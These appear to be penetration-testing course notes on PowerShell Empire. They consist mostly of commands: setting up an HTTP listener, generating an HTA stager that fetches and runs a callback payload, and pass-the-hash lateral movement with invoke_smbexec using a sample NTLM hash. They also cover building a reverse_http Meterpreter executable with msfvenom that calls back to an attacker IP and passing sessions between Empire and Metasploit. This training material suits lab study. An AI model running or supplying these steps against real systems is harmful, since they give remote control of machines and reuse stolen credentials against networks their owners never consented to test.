# Module 23 (Powershell Empire)

## Powershell Empire 

### Listener

```
// Empire commands used
?
uselistener http
info
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F64EjPtfpDvQFvcfVHvK0%2Fimage.png?alt=media&#x26;token=0677706a-04ef-4386-9156-90ce535009b2" alt=""><figcaption></figcaption></figure>

Starting the listener:

```bash
execute
```

### Stager

Stager will download and execute the final payload which will call back to the listener we set up previously - `http`- below shows how to set it up:

```bash
//specify what stager to use
usestager windows/hta

//associate stager with the http listener
set Listener meterpreter

//write stager to the file
set OutFile stage.hta

//create the stager
execute
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FxysXsOSXSzQd7OebAurK%2Fimage.png?alt=media&#x26;token=4f9d069e-3009-47ea-bff7-718fca498555" alt=""><figcaption></figcaption></figure>

### Lateral Movement

```bash
usemodule lateral_movement/technique
usemodule lateral_movement/invoke_smbexec
```

```
set ComputerName client251
set Listener http
set Username jeff_admin
set Hash e2b475c11da2a0748290d87aa966c327
set Domain corp.com
execute
```

### Switching Between Empire and Metasploit

Metasploit to Empire

```
msfvenom -p windows/meterpreter/reverse_http LHOST=10.11.0.4 LPORT=7777 -
f exe -o met.exe
use multi/handler
set payload windows/meterpreter/reverse_http
set LPORT 7777
set LHOST 10.11.0.4
run
```

Empire&#x20;

```
upload /home/h3ckt0r/met.exe
shell dir
shell C:\Users\offsec.corp\Downloads>met.exe
```

Empire to Metasploit

```
 usestager windows/launcher_bat
 set Listener http
 execute
```

Metasploit

```
upload /tmp/launcher.bat
shell
dir
lanucher.bat
```